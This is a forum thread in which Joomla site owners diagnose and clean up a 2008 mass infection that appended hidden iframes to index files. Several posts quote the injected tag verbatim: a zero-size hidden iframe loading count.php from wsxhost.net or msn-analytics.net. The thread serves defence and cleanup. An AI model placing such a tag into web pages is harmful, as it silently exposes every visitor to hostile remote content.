iframe infections - tmp directory exploit

[repenra]

Don't sure if this been adressed yet. But just in case....
A lot of popular scripts developed for PHP 4 are currently being hacked through a tmp directory exploit. It also happens to Joomla (both 1.x and 1.5x). It manifest's itself in an appended line in index.php (pls check also administrator/index.php), which through an iframe makes an ulr query (GET) to a count. php file. External website varies (depends on infected slaves/hosts) bit can be picnoc.org, picnoc.info or wsxhost.net. The code line (appended last in above mentioned files) resembles "<iframe src="http://pinoc.org/count.php?o=2" </iframe>

To get rid of the url query, just delete the actual line in index.php (administrator/index.php).
More info in this link:
http://blog.floogy.com/2008/08/fix-pino ... cinfo.html

Any ideas how to block this out pre-emptive?

[chroma99]

I've been seeing the effects of a similar attack. Part of the attack is now adding an @readfile() function call to include a file from "[modnote: cracker sites removed!]

What makes you think that this is related to the tmp directory?

I advise setting up Tripwire as a fallback to notify you if files have changed.

[astroboysoup]

We found a similar exploit here

http://safebrowsing.clients.google.com/ ... /index.php

Obviously that is the google diagnostic page of the site.

Peter
PB Web Development

[repenra]

qotoe including site references removed.

"Tmp directory exploit" - nothing more than the proposed idea in the ref/linked blog entry and the fact that the write settings must have been circumvented. Anyway, if it's that easy to modify a file it's a fundamental threat. Thanks for the advise.

[brad]

You should NOT be using php4.. it's EOL already..

So, therefore, to protect yourself, use the latest stable of Joomla as well as php. As of now that is php5.2.6, Joomla 1.0.15 and Joomla 1.5.7

[islatur]

also note that is happneing with this address

Code: Select all

<iframe src="http://wsxhost.net/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>

[alecrespi]

also note that is happneing with this address

Code: Select all

<iframe src="http://wsxhost.net/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>

Hello everybody.
My site http://www.ccancients.net has been infectd with trojan infection described in this post.
Following instructions I've deleted relative line in INDEX.PHP (directory "administrator").
Recenty I've also updated to Joomla 1.5.7
By now in frontend I continue to see browser trying to connect to "wsxhost.net".
I really have no idea on how to solve this... can somebody help me?

Thank you in advance
Alessandro

[repenra]

The line is infected in all index*.*-files (index.php and index.html). If possible download your site and do a search and replace on the string "http://wsxhost.net/count.php?o=2" replace it with nothing (empty space). Then upload the files. That should do it. If you have a SSH accesss (or Telnet) you can do this directly on the server (a faster track), pls consult your web provider for further instructions on this.

[ivanicus]

Finally, does it infect 1.5.7 with php5+ ?????

[fw116]

it can not infect php or joomla.

your problem is : weak directory and file permissions.

if you guys would check the documentation part of this website , youll would find everything your need to secure your site...


start here :

http://docs.joomla.org/Security_and_Performance_FAQs

[Anarchyx67]

I've been seeing the effects of a similar attack. Part of the attack is now adding an @readfile() function call to include a file from "wsx3host.net", spam for amateur.zxchost.com and vessex.ru.

What makes you think that this is related to the tmp directory?

I advise setting up Tripwire as a fallback to notify you if files have changed.

And how much is Tripwire exactly??

[chroma99]

Do you have evidence for that, fw116?

your problem is : weak directory and file permissions.

[chroma99]

Available for the low cost of $0.

See here:
http://sourceforge.net/projects/tripwire

And how much is Tripwire exactly??

[chroma99]

My current best guess is that this problem is due to a bug fixed in 1.0.15:

--------------- 1.0.15 Stable Released -- [22-February-2008 23:00 UTC] ---------------------

06-Feb-2008 Andrew Eddie
* SECURITY [HIGH level]: Fixed remote file inclusion vulnerability

[Anarchyx67]

Available for the low cost of $0.

See here:
http://sourceforge.net/projects/tripwire

And how much is Tripwire exactly??

Thanks. And is there any way to use Tripwire with shared hosting at all? I don't see much on the subject and it looks like that link you gave mainly supplies just source code.

[Mox52]

We found a similar exploit here

http://safebrowsing.clients.google.com/ ... /index.php

Im from Brazil...

Google Chrome found almost same exploit in my project, http://dfm.ffclrp.br/ldc

How i get this diagnostic again?!?!

Weeks ago the University's server has been hacked... Many deleted archives...

I Use Joomla 1.5.6 (will migrate 1.5.7), the univerrsity uses php 5.2.4...

The extension Joomla Comment 3.2.4 notice, after 'request failure':

<iframe src="http://wsxhost.net/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe><iframe src="http://msn-analytics.net/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe><?xml version="1.0" standalone="yes"?><post><id>captchaalert</id><captcha><![CDATA[<a title="clique para uma nova imagem" href='javascript:JOSC_reloadCaptcha()'><img src="http://dfm.ffclrp.usp.br/ldc/components ... 617ce6b4e5" alt="Security Image" />
<input type="hidden" name="security_refid" value="a559f340b4c0fe0034fb0f617ce6b4e5" /></a>]]></captcha><noerror>1</noerror></post>

I install Joomla Tools Suite... Not abnormal in notices [Edit: got warnings in tmp directory]. But he dont work correctly on 1.5.6...

Thx...

[]'s!

[chroma99]

I can think of several ways it might work: if you can remotely mount the shared hosting filesystem, if the host provides you with shell access, etc.

I believe there are other software packages out there that do approximately the same thing as Tripwire; something else may work better in your situation.

Thanks. And is there any way to use Tripwire with shared hosting at all? I don't see much on the subject and it looks like that link you gave mainly supplies just source code.

[Mox52]

Question: how fix it?

Thx!

[brad]

Question: how fix it?

Thx!

Search these forums? Read some of the recent threads? Restore from a backup?

[repenra]

To fix the problem is quite easy, but to prevent it is another bag....

To fix it: do a search&replace on the string "count.php?o=2". Replace the whole Iframe tag with nothing, i.e delete the tag. The tag is appended after the end tag (</html> (mainly) in your index.php and index.html files.

There is a structural directory problem in almost all web applications since the application (which is the same as everybody or the "world") need rights to write to at least a configuration file (could possibly be remedied by storing all the credentials in a db table instead) and to temp, cache directories.

[geester]

Thanks, using this information, I have managed to clear all my problems! Thanks tonnes.

[Mox52]

Thx all!

Will read docs.joomla.org!!

Sry for signture!

[elstinko]

I found these files of mine to be infected.

root/index.php
root/templates/ALL index files both .php and .html in ALL templates
root/administrator/index.php
root/templates//administrator/ALL index files both .php and .html in all templates

[Mod Note - removed reference to module alleged to be responsible - take this up directly with the developer and don't use these forums to name and shame]

But for the record I have the correct Joomla supported register globals and directory permission security settings on a reliable linux server.

We are using the latest and stable PHP 5 build.

We are only using 2 third part plugins but they are common and known to be secure. Plus I locked them down.

In conclusion we still got hacked. So the cause is not PHP 4, PHP settings or folder permissions outside the scope of what Joomla recommends.

With that said I decided to make the templates directories unwriteable. So we will lose the backend management flexibility, but oh well. Then I removed mod_analytics. I am looking forward to the day someone finds the culprit.

[chroma99]

Which Joomla version were you running when your website was infected?

I found these files of mine to be infected.

root/index.php
root/templates/ALL index files both .php and .html in ALL templates
root/administrator/index.php
root/templates//administrator/ALL index files both .php and .html in all templates

[Mod Note - removed reference to module alleged to be responsible - take this up directly with the developer and don't use these forums to name and shame]

But for the record I have the correct Joomla supported register globals and directory permission security settings on a reliable linux server.

We are using the latest and stable PHP 5 build.

We are only using 2 third part plugins but they are common and known to be secure. Plus I locked them down.

In conclusion we still got hacked. So the cause is not PHP 4, PHP settings or folder permissions outside the scope of what Joomla recommends.

With that said I decided to make the templates directories unwriteable. So we will lose the backend management flexibility, but oh well. Then I removed mod_analytics. I am looking forward to the day someone finds the culprit.

[huubrk]

I'am having problems to delete the line in alle the index files, some of them can not be edited online. How can I overwrite these files?

[ircmaxell]

tmp directory exploit? BS! Even if a file is 777, there's no way to write to it from the outside on a properly configured server. All this hoopla about 777 is BS. If you share your server, yes, other users ON THE MACHINE ALREADY can edit those files. But someone from the outside CANNOT.

Show me a proof of concept that doesn't rely on another hole in an application (meaning a hole in Joomla, etc), and I'll believe that, but otherwise I really don't...

[chroma99]

I agree, which is why I believe the problem is due to the bug I mentioned earlier. After the upgrade to J! 1.0.15, the bad guys haven't been back.

tmp directory exploit? BS!

[repenra]

I'am having problems to delete the line in alle the index files, some of them can not be edited online. How can I overwrite these files?

You have to do it locallay and then upload the files to your server.

If you have access to SSH (shell access) you can do it remotely, but there are som tricky commands to master. Ask your Web host for advice.

[islatur]

I believe it was not joomla the source of the problem.
i got infected with the latest version 1.57, after reading up on the problem i ran accross a solution here
http://blog.floogy.com/2008/08/fix-pino ... cinfo.html
after reading this I noticed that I was still using the old php which i updated with two clicks.

I got shell access from bluehost, ran a modified version of the command stated on the link above and it was done. All infections were gone.

Something I noticed from this spyware is that infects every html file.... i had over 1000 files infected with the iframe. this will slow down your website and you might get blacklisted on google or stopbadware.org which is bad... very bad.

[senorsam]

Not only was my Joomla installation in one directory impacted, my ENTIRE hosting account was affected. That includes tens of sites and hundreds of directories. I disagree with the moderator's choice to censor the name of the plugin/module/component that might be responsible. I'm not interested in a witch hunt. I'm concerned that even after I correct hundreds of files, I will still be vulnerable without any clue of where this attack started.

In my opinion, the moderator is acting irresponsibly if indeed the cause of the vulnerability is known.

Do you know which third-party plugin/module/component might be responsible? Any help is appreciated!

Sam